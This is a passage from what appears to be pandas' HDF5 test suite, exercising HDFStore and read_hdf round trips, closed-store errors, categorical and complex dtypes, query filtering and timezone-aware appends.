result = store.select('test_dataset', start=start, stop=stop)
assert_frame_equal(df[start:stop], result)
def test_path_pathlib_hdfstore(self):
df = tm.makeDataFrame()
def writer(path):
with pd.HDFStore(path) as store:
df.to_hdf(store, 'df')
def reader(path):
with pd.HDFStore(path) as store:
return pd.read_hdf(store, 'df')
result = tm.round_trip_pathlib(writer, reader)
tm.assert_frame_equal(df, result)
def test_pickle_path_localpath(self):
df = tm.makeDataFrame()
result = tm.round_trip_pathlib(
lambda p: df.to_hdf(p, 'df'),
lambda p: pd.read_hdf(p, 'df'))
tm.assert_frame_equal(df, result)
def test_path_localpath_hdfstore(self):
df = tm.makeDataFrame()
def writer(path):
with pd.HDFStore(path) as store:
df.to_hdf(store, 'df')
def reader(path):
with pd.HDFStore(path) as store:
return pd.read_hdf(store, 'df')
result = tm.round_trip_localpath(writer, reader)
tm.assert_frame_equal(df, result)
def _check_roundtrip(self, obj, comparator, compression=False, **kwargs):
options = {}
if compression:
options['complib'] = _default_compressor
with ensure_clean_store(self.path, 'w', **options) as store:
store['obj'] = obj
retrieved = store['obj']
comparator(retrieved, obj, **kwargs)
def _check_double_roundtrip(self, obj, comparator, compression=False,
**kwargs):
options = {}
if compression:
options['complib'] = compression or _default_compressor
with ensure_clean_store(self.path, 'w', **options) as store:
store['obj'] = obj
retrieved = store['obj']
comparator(retrieved, obj, **kwargs)
store['obj'] = retrieved
again = store['obj']
comparator(again, obj, **kwargs)
def _check_roundtrip_table(self, obj, comparator, compression=False):
options = {}
if compression:
options['complib'] = _default_compressor
with ensure_clean_store(self.path, 'w', **options) as store:
store.put('obj', obj, format='table')
retrieved = store['obj']
comparator(retrieved, obj)
def test_multiple_open_close(self):
# gh-4409: open & close multiple times
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
df.to_hdf(path, 'df', mode='w', format='table')
# single
store = HDFStore(path)
assert 'CLOSED' not in store.info()
assert store.is_open
store.close()
assert 'CLOSED' in store.info()
assert not store.is_open
with ensure_clean_path(self.path) as path:
if pytables._table_file_open_policy_is_strict:
# multiples
store1 = HDFStore(path)
def f():
HDFStore(path)
pytest.raises(ValueError, f)
store1.close()
else:
# multiples
store1 = HDFStore(path)
store2 = HDFStore(path)
assert 'CLOSED' not in store1.info()
assert 'CLOSED' not in store2.info()
assert store1.is_open
assert store2.is_open
store1.close()
assert 'CLOSED' in store1.info()
assert not store1.is_open
assert 'CLOSED' not in store2.info()
assert store2.is_open
store2.close()
assert 'CLOSED' in store1.info()
assert 'CLOSED' in store2.info()
assert not store1.is_open
assert not store2.is_open
# nested close
store = HDFStore(path, mode='w')
store.append('df', df)
store2 = HDFStore(path)
store2.append('df2', df)
store2.close()
assert 'CLOSED' in store2.info()
assert not store2.is_open
store.close()
assert 'CLOSED' in store.info()
assert not store.is_open
# double closing
store = HDFStore(path, mode='w')
store.append('df', df)
store2 = HDFStore(path)
store.close()
assert 'CLOSED' in store.info()
assert not store.is_open
store2.close()
assert 'CLOSED' in store2.info()
assert not store2.is_open
# ops on a closed store
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
df.to_hdf(path, 'df', mode='w', format='table')
store = HDFStore(path)
store.close()
pytest.raises(ClosedFileError, store.keys)
pytest.raises(ClosedFileError, lambda: 'df' in store)
pytest.raises(ClosedFileError, lambda: len(store))
pytest.raises(ClosedFileError, lambda: store['df'])
pytest.raises(AttributeError, lambda: store.df)
pytest.raises(ClosedFileError, store.select, 'df')
pytest.raises(ClosedFileError, store.get, 'df')
pytest.raises(ClosedFileError, store.append, 'df2', df)
pytest.raises(ClosedFileError, store.put, 'df3', df)
pytest.raises(ClosedFileError, store.get_storer, 'df2')
pytest.raises(ClosedFileError, store.remove, 'df2')
def f():
store.select('df')
tm.assert_raises_regex(ClosedFileError, 'file is not open', f)
def test_pytables_native_read(self):
with ensure_clean_store(
tm.get_data_path('legacy_hdf/pytables_native.h5'),
mode='r') as store:
d2 = store['detector/readout']
assert isinstance(d2, DataFrame)
@pytest.mark.skipif(PY35 and is_platform_windows(),
reason="native2 read fails oddly on windows / 3.5")
def test_pytables_native2_read(self):
with ensure_clean_store(
tm.get_data_path('legacy_hdf/pytables_native2.h5'),
mode='r') as store:
str(store)
d1 = store['detector']
assert isinstance(d1, DataFrame)
def test_legacy_table_read(self):
# legacy table types
with ensure_clean_store(
tm.get_data_path('legacy_hdf/legacy_table.h5'),
mode='r') as store:
with catch_warnings(record=True):
store.select('df1')
store.select('df2')
store.select('wp1')
# force the frame
store.select('df2', typ='legacy_frame')
# old version warning
pytest.raises(
Exception, store.select, 'wp1', 'minor_axis=B')
df2 = store.select('df2')
result = store.select('df2', 'index>df2.index[2]')
expected = df2[df2.index > df2.index[2]]
assert_frame_equal(expected, result)
def test_copy(self):
with catch_warnings(record=True):
def do_copy(f, new_f=None, keys=None,
propindexes=True, **kwargs):
try:
store = HDFStore(f, 'r')
if new_f is None:
import tempfile
fd, new_f = tempfile.mkstemp()
tstore = store.copy(
new_f, keys=keys, propindexes=propindexes, **kwargs)
# check keys
if keys is None:
keys = store.keys()
assert set(keys) == set(tstore.keys())
# check indicies & nrows
for k in tstore.keys():
if tstore.get_storer(k).is_table:
new_t = tstore.get_storer(k)
orig_t = store.get_storer(k)
assert orig_t.nrows == new_t.nrows
# check propindixes
if propindexes:
for a in orig_t.axes:
if a.is_indexed:
assert new_t[a.name].is_indexed
finally:
safe_close(store)
safe_close(tstore)
try:
os.close(fd)
except:
pass
safe_remove(new_f)
# new table
df = tm.makeDataFrame()
try:
path = create_tempfile(self.path)
st = HDFStore(path)
st.append('df', df, data_columns=['A'])
st.close()
do_copy(f=path)
do_copy(f=path, propindexes=False)
finally:
safe_remove(path)
def test_store_datetime_fractional_secs(self):
with ensure_clean_store(self.path) as store:
dt = datetime.datetime(2012, 1, 2, 3, 4, 5, 123456)
series = Series([0], [dt])
store['a'] = series
assert store['a'].index[0] == dt
def test_tseries_indices_series(self):
with ensure_clean_store(self.path) as store:
idx = tm.makeDateIndex(10)
ser = Series(np.random.randn(len(idx)), idx)
store['a'] = ser
result = store['a']
tm.assert_series_equal(result, ser)
assert result.index.freq == ser.index.freq
tm.assert_class_equal(result.index, ser.index, obj="series index")
idx = tm.makePeriodIndex(10)
ser = Series(np.random.randn(len(idx)), idx)
store['a'] = ser
result = store['a']
tm.assert_series_equal(result, ser)
assert result.index.freq == ser.index.freq
tm.assert_class_equal(result.index, ser.index, obj="series index")
def test_tseries_indices_frame(self):
with ensure_clean_store(self.path) as store:
idx = tm.makeDateIndex(10)
df = DataFrame(np.random.randn(len(idx), 3), index=idx)
store['a'] = df
result = store['a']
assert_frame_equal(result, df)
assert result.index.freq == df.index.freq
tm.assert_class_equal(result.index, df.index,
obj="dataframe index")
idx = tm.makePeriodIndex(10)
df = DataFrame(np.random.randn(len(idx), 3), idx)
store['a'] = df
result = store['a']
assert_frame_equal(result, df)
assert result.index.freq == df.index.freq
tm.assert_class_equal(result.index, df.index,
obj="dataframe index")
def test_unicode_index(self):
unicode_values = [u('\u03c3'), u('\u03c3\u03c3')]
# PerformanceWarning
with catch_warnings(record=True):
s = Series(np.random.randn(len(unicode_values)), unicode_values)
self._check_roundtrip(s, tm.assert_series_equal)
def test_unicode_longer_encoded(self):
# GH 11234
char = '\u0394'
df = pd.DataFrame({'A': [char]})
with ensure_clean_store(self.path) as store:
store.put('df', df, format='table', encoding='utf-8')
result = store.get('df')
tm.assert_frame_equal(result, df)
df = pd.DataFrame({'A': ['a', char], 'B': ['b', 'b']})
with ensure_clean_store(self.path) as store:
store.put('df', df, format='table', encoding='utf-8')
result = store.get('df')
tm.assert_frame_equal(result, df)
def test_store_datetime_mixed(self):
df = DataFrame(
{'a': [1, 2, 3], 'b': [1., 2., 3.], 'c': ['a', 'b', 'c']})
ts = tm.makeTimeSeries()
df['d'] = ts.index[:3]
self._check_roundtrip(df, tm.assert_frame_equal)
# def test_cant_write_multiindex_table(self):
# # for now, #1848
# df = DataFrame(np.random.randn(10, 4),
# index=[np.arange(5).repeat(2),
# np.tile(np.arange(2), 5)])
# pytest.raises(Exception, store.put, 'foo', df, format='table')
def test_append_with_diff_col_name_types_raises_value_error(self):
df = DataFrame(np.random.randn(10, 1))
df2 = DataFrame({'a': np.random.randn(10)})
df3 = DataFrame({(1, 2): np.random.randn(10)})
df4 = DataFrame({('1', 2): np.random.randn(10)})
df5 = DataFrame({('1', 2, object): np.random.randn(10)})
with ensure_clean_store(self.path) as store:
name = 'df_%s' % tm.rands(10)
store.append(name, df)
for d in (df2, df3, df4, df5):
with pytest.raises(ValueError):
store.append(name, d)
def test_query_with_nested_special_character(self):
df = DataFrame({'a': ['a', 'a', 'c', 'b',
'test & test', 'c', 'b', 'e'],
'b': [1, 2, 3, 4, 5, 6, 7, 8]})
expected = df[df.a == 'test & test']
with ensure_clean_store(self.path) as store:
store.append('test', df, format='table', data_columns=True)
result = store.select('test', 'a = "test & test"')
tm.assert_frame_equal(expected, result)
def test_categorical(self):
with ensure_clean_store(self.path) as store:
# Basic
_maybe_remove(store, 's')
s = Series(Categorical(['a', 'b', 'b', 'a', 'a', 'c'], categories=[
'a', 'b', 'c', 'd'], ordered=False))
store.append('s', s, format='table')
result = store.select('s')
tm.assert_series_equal(s, result)
_maybe_remove(store, 's_ordered')
s = Series(Categorical(['a', 'b', 'b', 'a', 'a', 'c'], categories=[
'a', 'b', 'c', 'd'], ordered=True))
store.append('s_ordered', s, format='table')
result = store.select('s_ordered')
tm.assert_series_equal(s, result)
_maybe_remove(store, 'df')
df = DataFrame({"s": s, "vals": [1, 2, 3, 4, 5, 6]})
store.append('df', df, format='table')
result = store.select('df')
tm.assert_frame_equal(result, df)
# Dtypes
s = Series([1, 1, 2, 2, 3, 4, 5]).astype('category')
store.append('si', s)
result = store.select('si')
tm.assert_series_equal(result, s)
s = Series([1, 1, np.nan, 2, 3, 4, 5]).astype('category')
store.append('si2', s)
result = store.select('si2')
tm.assert_series_equal(result, s)
# Multiple
df2 = df.copy()
df2['s2'] = Series(list('abcdefg')).astype('category')
store.append('df2', df2)
result = store.select('df2')
tm.assert_frame_equal(result, df2)
# Make sure the metadata is OK
info = store.info()
assert '/df2 ' in info
# assert '/df2/meta/values_block_0/meta' in info
assert '/df2/meta/values_block_1/meta' in info
# unordered
s = Series(Categorical(['a', 'b', 'b', 'a', 'a', 'c'], categories=[
'a', 'b', 'c', 'd'], ordered=False))
store.append('s2', s, format='table')
result = store.select('s2')
tm.assert_series_equal(result, s)
# Query
store.append('df3', df, data_columns=['s'])
expected = df[df.s.isin(['b', 'c'])]
result = store.select('df3', where=['s in ["b","c"]'])
tm.assert_frame_equal(result, expected)
expected = df[df.s.isin(['b', 'c'])]
result = store.select('df3', where=['s = ["b","c"]'])
tm.assert_frame_equal(result, expected)
expected = df[df.s.isin(['d'])]
result = store.select('df3', where=['s in ["d"]'])
tm.assert_frame_equal(result, expected)
expected = df[df.s.isin(['f'])]
result = store.select('df3', where=['s in ["f"]'])
tm.assert_frame_equal(result, expected)
# Appending with same categories is ok
store.append('df3', df)
df = concat([df, df])
expected = df[df.s.isin(['b', 'c'])]
result = store.select('df3', where=['s in ["b","c"]'])
tm.assert_frame_equal(result, expected)
# Appending must have the same categories
df3 = df.copy()
df3['s'].cat.remove_unused_categories(inplace=True)
with pytest.raises(ValueError):
store.append('df3', df3)
# Remove, and make sure meta data is removed (its a recursive
# removal so should be).
result = store.select('df3/meta/s/meta')
assert result is not None
store.remove('df3')
with pytest.raises(KeyError):
store.select('df3/meta/s/meta')
def test_categorical_conversion(self):
# GH13322
# Check that read_hdf with categorical columns doesn't return rows if
# where criteria isn't met.
obsids = ['ESP_012345_6789', 'ESP_987654_3210']
imgids = ['APF00006np', 'APF0001imm']
data = [4.3, 9.8]
# Test without categories
df = DataFrame(dict(obsids=obsids, imgids=imgids, data=data))
# We are expecting an empty DataFrame matching types of df
expected = df.iloc[[], :]
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table', data_columns=True)
result = read_hdf(path, 'df', where='obsids=B')
tm.assert_frame_equal(result, expected)
# Test with categories
df.obsids = df.obsids.astype('category')
df.imgids = df.imgids.astype('category')
# We are expecting an empty DataFrame matching types of df
expected = df.iloc[[], :]
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table', data_columns=True)
result = read_hdf(path, 'df', where='obsids=B')
tm.assert_frame_equal(result, expected)
def test_categorical_nan_only_columns(self):
# GH18413
# Check that read_hdf with categorical columns with NaN-only values can
# be read back.
df = pd.DataFrame({
'a': ['a', 'b', 'c', np.nan],
'b': [np.nan, np.nan, np.nan, np.nan],
'c': [1, 2, 3, 4],
'd': pd.Series([None] * 4, dtype=object)
})
df['a'] = df.a.astype('category')
df['b'] = df.b.astype('category')
df['d'] = df.b.astype('category')
expected = df
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table', data_columns=True)
result = read_hdf(path, 'df')
tm.assert_frame_equal(result, expected)
def test_duplicate_column_name(self):
df = DataFrame(columns=["a", "a"], data=[[0, 0]])
with ensure_clean_path(self.path) as path:
pytest.raises(ValueError, df.to_hdf,
path, 'df', format='fixed')
df.to_hdf(path, 'df', format='table')
other = read_hdf(path, 'df')
tm.assert_frame_equal(df, other)
assert df.equals(other)
assert other.equals(df)
def test_round_trip_equals(self):
# GH 9330
df = DataFrame({"B": [1, 2], "A": ["x", "y"]})
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table')
other = read_hdf(path, 'df')
tm.assert_frame_equal(df, other)
assert df.equals(other)
assert other.equals(df)
def test_preserve_timedeltaindex_type(self):
# GH9635
# Storing TimedeltaIndexed DataFrames in fixed stores did not preserve
# the type of the index.
df = DataFrame(np.random.normal(size=(10, 5)))
df.index = timedelta_range(
start='0s', periods=10, freq='1s', name='example')
with ensure_clean_store(self.path) as store:
store['df'] = df
assert_frame_equal(store['df'], df)
def test_columns_multiindex_modified(self):
# BUG: 7212
# read_hdf store.select modified the passed columns parameters
# when multi-indexed.
df = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
df.index.name = 'letters'
df = df.set_index(keys='E', append=True)
data_columns = df.index.names + df.columns.tolist()
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df',
mode='a',
append=True,
data_columns=data_columns,
index=False)
cols2load = list('BCD')
cols2load_original = list(cols2load)
df_loaded = read_hdf(path, 'df', columns=cols2load) # noqa
assert cols2load_original == cols2load
def test_to_hdf_with_object_column_names(self):
# GH9057
# Writing HDF5 table format should only work for string-like
# column types
types_should_fail = [tm.makeIntIndex, tm.makeFloatIndex,
tm.makeDateIndex, tm.makeTimedeltaIndex,
tm.makePeriodIndex]
types_should_run = [tm.makeStringIndex, tm.makeCategoricalIndex]
if compat.PY3:
types_should_run.append(tm.makeUnicodeIndex)
else:
types_should_fail.append(tm.makeUnicodeIndex)
for index in types_should_fail:
df = DataFrame(np.random.randn(10, 2), columns=index(2))
with ensure_clean_path(self.path) as path:
with catch_warnings(record=True):
with pytest.raises(
ValueError, msg=("cannot have non-object label "
"DataIndexableCol")):
df.to_hdf(path, 'df', format='table',
data_columns=True)
for index in types_should_run:
df = DataFrame(np.random.randn(10, 2), columns=index(2))
with ensure_clean_path(self.path) as path:
with catch_warnings(record=True):
df.to_hdf(path, 'df', format='table', data_columns=True)
result = pd.read_hdf(
path, 'df', where="index = [{0}]".format(df.index[0]))
assert(len(result))
def test_read_hdf_open_store(self):
# GH10330
# No check for non-string path_or-buf, and no test of open store
df = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
df.index.name = 'letters'
df = df.set_index(keys='E', append=True)
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', mode='w')
direct = read_hdf(path, 'df')
store = HDFStore(path, mode='r')
indirect = read_hdf(store, 'df')
tm.assert_frame_equal(direct, indirect)
assert store.is_open
store.close()
def test_read_hdf_iterator(self):
df = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
df.index.name = 'letters'
df = df.set_index(keys='E', append=True)
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', mode='w', format='t')
direct = read_hdf(path, 'df')
iterator = read_hdf(path, 'df', iterator=True)
assert isinstance(iterator, TableIterator)
indirect = next(iterator.__iter__())
tm.assert_frame_equal(direct, indirect)
iterator.store.close()
def test_read_hdf_errors(self):
df = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as path:
pytest.raises(IOError, read_hdf, path, 'key')
df.to_hdf(path, 'df')
store = HDFStore(path, mode='r')
store.close()
pytest.raises(IOError, read_hdf, store, 'df')
def test_read_hdf_generic_buffer_errors(self):
pytest.raises(NotImplementedError, read_hdf, BytesIO(b''), 'df')
def test_invalid_complib(self):
df = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as path:
with pytest.raises(ValueError):
df.to_hdf(path, 'df', complib='foolib')
# GH10443
def test_read_nokey(self):
df = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
# Categorical dtype not supported for "fixed" format. So no need
# to test with that dtype in the dataframe here.
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', mode='a')
reread = read_hdf(path)
assert_frame_equal(df, reread)
df.to_hdf(path, 'df2', mode='a')
pytest.raises(ValueError, read_hdf, path)
def test_read_nokey_table(self):
# GH13231
df = DataFrame({'i': range(5),
'c': Series(list('abacd'), dtype='category')})
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', mode='a', format='table')
reread = read_hdf(path)
assert_frame_equal(df, reread)
df.to_hdf(path, 'df2', mode='a', format='table')
pytest.raises(ValueError, read_hdf, path)
def test_read_nokey_empty(self):
with ensure_clean_path(self.path) as path:
store = HDFStore(path)
store.close()
pytest.raises(ValueError, read_hdf, path)
@td.skip_if_no('pathlib')
def test_read_from_pathlib_path(self):
# GH11773
from pathlib import Path
expected = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as filename:
path_obj = Path(filename)
expected.to_hdf(path_obj, 'df', mode='a')
actual = read_hdf(path_obj, 'df')
tm.assert_frame_equal(expected, actual)
@td.skip_if_no('py.path')
def test_read_from_py_localpath(self):
# GH11773
from py.path import local as LocalPath
expected = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as filename:
path_obj = LocalPath(filename)
expected.to_hdf(path_obj, 'df', mode='a')
actual = read_hdf(path_obj, 'df')
tm.assert_frame_equal(expected, actual)
def test_query_long_float_literal(self):
# GH 14241
df = pd.DataFrame({'A': [1000000000.0009,
1000000000.0011,
1000000000.0015]})
with ensure_clean_store(self.path) as store:
store.append('test', df, format='table', data_columns=True)
cutoff = 1000000000.0006
result = store.select('test', "A < %.4f" % cutoff)
assert result.empty
cutoff = 1000000000.0010
result = store.select('test', "A > %.4f" % cutoff)
expected = df.loc[[1, 2], :]
tm.assert_frame_equal(expected, result)
exact = 1000000000.0011
result = store.select('test', 'A == %.4f' % exact)
expected = df.loc[[1], :]
tm.assert_frame_equal(expected, result)
def test_query_compare_column_type(self):
# GH 15492
df = pd.DataFrame({'date': ['2014-01-01', '2014-01-02'],
'real_date': date_range('2014-01-01', periods=2),
'float': [1.1, 1.2],
'int': [1, 2]},
columns=['date', 'real_date', 'float', 'int'])
with ensure_clean_store(self.path) as store:
store.append('test', df, format='table', data_columns=True)
ts = pd.Timestamp('2014-01-01') # noqa
result = store.select('test', where='real_date > ts')
expected = df.loc[[1], :]
tm.assert_frame_equal(expected, result)
for op in ['<', '>', '==']:
# non strings to string column always fail
for v in [2.1, True, pd.Timestamp('2014-01-01'),
pd.Timedelta(1, 's')]:
query = 'date {op} v'.format(op=op)
with pytest.raises(TypeError):
result = store.select('test', where=query)
# strings to other columns must be convertible to type
v = 'a'
for col in ['int', 'float', 'real_date']:
query = '{col} {op} v'.format(op=op, col=col)
with pytest.raises(ValueError):
result = store.select('test', where=query)
for v, col in zip(['1', '1.1', '2014-01-01'],
['int', 'float', 'real_date']):
query = '{col} {op} v'.format(op=op, col=col)
result = store.select('test', where=query)
if op == '==':
expected = df.loc[[0], :]
elif op == '>':
expected = df.loc[[1], :]
else:
expected = df.loc[[], :]
tm.assert_frame_equal(expected, result)
@pytest.mark.parametrize('format', ['fixed', 'table'])
def test_read_hdf_series_mode_r(self, format):
# GH 16583
# Tests that reading a Series saved to an HDF file
# still works if a mode='r' argument is supplied
series = tm.makeFloatSeries()
with ensure_clean_path(self.path) as path:
series.to_hdf(path, key='data', format=format)
result = pd.read_hdf(path, key='data', mode='r')
tm.assert_series_equal(result, series)
@pytest.mark.skipif(not PY36, reason="Need python 3.6")
def test_fspath(self):
with tm.ensure_clean('foo.h5') as path:
with pd.HDFStore(path) as store:
assert os.fspath(store) == str(path)
def test_read_py2_hdf_file_in_py3(self):
# GH 16781
# tests reading a PeriodIndex DataFrame written in Python2 in Python3
# the file was generated in Python 2.7 like so:
#
# df = pd.DataFrame([1.,2,3], index=pd.PeriodIndex(
# ['2015-01-01', '2015-01-02', '2015-01-05'], freq='B'))
# df.to_hdf('periodindex_0.20.1_x86_64_darwin_2.7.13.h5', 'p')
expected = pd.DataFrame([1., 2, 3], index=pd.PeriodIndex(
['2015-01-01', '2015-01-02', '2015-01-05'], freq='B'))
with ensure_clean_store(
tm.get_data_path(
'legacy_hdf/periodindex_0.20.1_x86_64_darwin_2.7.13.h5'),
mode='r') as store:
result = store['p']
assert_frame_equal(result, expected)
class TestHDFComplexValues(Base):
# GH10447
def test_complex_fixed(self):
df = DataFrame(np.random.rand(4, 5).astype(np.complex64),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df')
reread = read_hdf(path, 'df')
assert_frame_equal(df, reread)
df = DataFrame(np.random.rand(4, 5).astype(np.complex128),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df')
reread = read_hdf(path, 'df')
assert_frame_equal(df, reread)
def test_complex_table(self):
df = DataFrame(np.random.rand(4, 5).astype(np.complex64),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table')
reread = read_hdf(path, 'df')
assert_frame_equal(df, reread)
df = DataFrame(np.random.rand(4, 5).astype(np.complex128),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table', mode='w')
reread = read_hdf(path, 'df')
assert_frame_equal(df, reread)
def test_complex_mixed_fixed(self):
complex64 = np.array([1.0 + 1.0j, 1.0 + 1.0j,
1.0 + 1.0j, 1.0 + 1.0j], dtype=np.complex64)
complex128 = np.array([1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j],
dtype=np.complex128)
df = DataFrame({'A': [1, 2, 3, 4],
'B': ['a', 'b', 'c', 'd'],
'C': complex64,
'D': complex128,
'E': [1.0, 2.0, 3.0, 4.0]},
index=list('abcd'))
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df')
reread = read_hdf(path, 'df')
assert_frame_equal(df, reread)
def test_complex_mixed_table(self):
complex64 = np.array([1.0 + 1.0j, 1.0 + 1.0j,
1.0 + 1.0j, 1.0 + 1.0j], dtype=np.complex64)
complex128 = np.array([1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j],
dtype=np.complex128)
df = DataFrame({'A': [1, 2, 3, 4],
'B': ['a', 'b', 'c', 'd'],
'C': complex64,
'D': complex128,
'E': [1.0, 2.0, 3.0, 4.0]},
index=list('abcd'))
with ensure_clean_store(self.path) as store:
store.append('df', df, data_columns=['A', 'B'])
result = store.select('df', where='A>2')
assert_frame_equal(df.loc[df.A > 2], result)
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table')
reread = read_hdf(path, 'df')
assert_frame_equal(df, reread)
def test_complex_across_dimensions_fixed(self):
with catch_warnings(record=True):
complex128 = np.array(
[1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j])
s = Series(complex128, index=list('abcd'))
df = DataFrame({'A': s, 'B': s})
p = Panel({'One': df, 'Two': df})
objs = [s, df, p]
comps = [tm.assert_series_equal, tm.assert_frame_equal,
tm.assert_panel_equal]
for obj, comp in zip(objs, comps):
with ensure_clean_path(self.path) as path:
obj.to_hdf(path, 'obj', format='fixed')
reread = read_hdf(path, 'obj')
comp(obj, reread)
def test_complex_across_dimensions(self):
complex128 = np.array([1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j])
s = Series(complex128, index=list('abcd'))
df = DataFrame({'A': s, 'B': s})
with catch_warnings(record=True):
p = Panel({'One': df, 'Two': df})
p4d = Panel4D({'i': p, 'ii': p})
objs = [df, p, p4d]
comps = [tm.assert_frame_equal, tm.assert_panel_equal,
tm.assert_panel4d_equal]
for obj, comp in zip(objs, comps):
with ensure_clean_path(self.path) as path:
obj.to_hdf(path, 'obj', format='table')
reread = read_hdf(path, 'obj')
comp(obj, reread)
def test_complex_indexing_error(self):
complex128 = np.array([1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j],
dtype=np.complex128)
df = DataFrame({'A': [1, 2, 3, 4],
'B': ['a', 'b', 'c', 'd'],
'C': complex128},
index=list('abcd'))
with ensure_clean_store(self.path) as store:
pytest.raises(TypeError, store.append,
'df', df, data_columns=['C'])
def test_complex_series_error(self):
complex128 = np.array([1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j])
s = Series(complex128, index=list('abcd'))
with ensure_clean_path(self.path) as path:
pytest.raises(TypeError, s.to_hdf, path, 'obj', format='t')
with ensure_clean_path(self.path) as path:
s.to_hdf(path, 'obj', format='t', index=False)
reread = read_hdf(path, 'obj')
tm.assert_series_equal(s, reread)
def test_complex_append(self):
df = DataFrame({'a': np.random.randn(100).astype(np.complex128),
'b': np.random.randn(100)})
with ensure_clean_store(self.path) as store:
store.append('df', df, data_columns=['b'])
store.append('df', df)
result = store.select('df')
assert_frame_equal(pd.concat([df, df], 0), result)
class TestTimezones(Base):
def _compare_with_tz(self, a, b):
tm.assert_frame_equal(a, b)
# compare the zones on each element
for c in a.columns:
for i in a.index:
a_e = a.loc[i, c]
b_e = b.loc[i, c]
if not (a_e == b_e and a_e.tz == b_e.tz):
raise AssertionError(
"invalid tz comparison [%s] [%s]" % (a_e, b_e))
def test_append_with_timezones_dateutil(self):
from datetime import timedelta
# use maybe_get_tz instead of dateutil.tz.gettz to handle the windows
# filename issues.
from pandas._libs.tslibs.timezones import maybe_get_tz
gettz = lambda x: maybe_get_tz('dateutil/' + x)
# as columns
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'df_tz')
df = DataFrame(dict(A=[Timestamp('20130102 2:00:00', tz=gettz(
'US/Eastern')) + timedelta(hours=1) * i for i in range(5)]))
store.append('df_tz', df, data_columns=['A'])
result = store['df_tz']
self._compare_with_tz(result, df)
assert_frame_equal(result, df)
# select with tz aware
expected = df[df.A >= df.A[3]]
result = store.select('df_tz', where='A>=df.A[3]')
self._compare_with_tz(result, expected)
# ensure we include dates in DST and STD time here.
_maybe_remove(store, 'df_tz')
df = DataFrame(dict(A=Timestamp('20130102',
tz=gettz('US/Eastern')),
B=Timestamp('20130603',
tz=gettz('US/Eastern'))),
index=range(5))
store.append('df_tz', df)
result = store['df_tz']
self._compare_with_tz(result, df)
assert_frame_equal(result, df)
df = DataFrame(dict(A=Timestamp('20130102',
tz=gettz('US/Eastern')),
B=Timestamp('20130102', tz=gettz('EET'))),
index=range(5))
pytest.raises(ValueError, store.append, 'df_tz', df)
# this is ok
_maybe_remove(store, 'df_tz')
store.append('df_tz', df, data_columns=['A', 'B'])
result = store['df_tz']
self._compare_with_tz(result, df)
assert_frame_equal(result, df)
# can't append with diff timezone
df = DataFrame(dict(A=Timestamp('20130102',
tz=gettz('US/Eastern')),
B=Timestamp('20130102', tz=gettz('CET'))),
index=range(5))
pytest.raises(ValueError, store.append, 'df_tz', df)
# as index
with ensure_clean_store(self.path) as store:
# GH 4098 example
df = DataFrame(dict(A=Series(lrange(3), index=date_range(
'2000-1-1', periods=3, freq='H', tz=gettz('US/Eastern')))))
_maybe_remove(store, 'df')
store.put('df', df)
result = store.select('df')
assert_frame_equal(result, df)
_maybe_remove(store, 'df')
store.append('df', df)
result = store.select('df')
assert_frame_equal(result, df)
def test_append_with_timezones_pytz(self):
from datetime import timedelta
# as columns
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'df_tz')
df = DataFrame(dict(A=[Timestamp('20130102 2:00:00',
tz='US/Eastern') +
timedelta(hours=1) * i
for i in range(5)]))
store.append('df_tz', df, data_columns=['A'])
result = store['df_tz']
self._compare_with_tz(result, df)
assert_frame_equal(result, df)
# select with tz aware
self._compare_with_tz(store.select(
'df_tz', where='A>=df.A[3]'), df[df.A >= df.A[3]])
_maybe_remove(store, 'df_tz')
# ensure we include dates in DST and STD time here.
df = DataFrame(dict(A=Timestamp('20130102', tz='US/Eastern'),
B=Timestamp('20130603', tz='US/Eastern')),
index=range(5))
store.append('df_tz', df)
result = store['df_tz']
self._compare_with_tz(result, df)
assert_frame_equal(result, df)
df = DataFrame(dict(A=Timestamp('20130102', tz='US/Eastern'),
B=Timestamp('20130102', tz='EET')),
index=range(5))
pytest.raises(ValueError, store.append, 'df_tz', df)
# this is ok
_maybe_remove(store, 'df_tz')
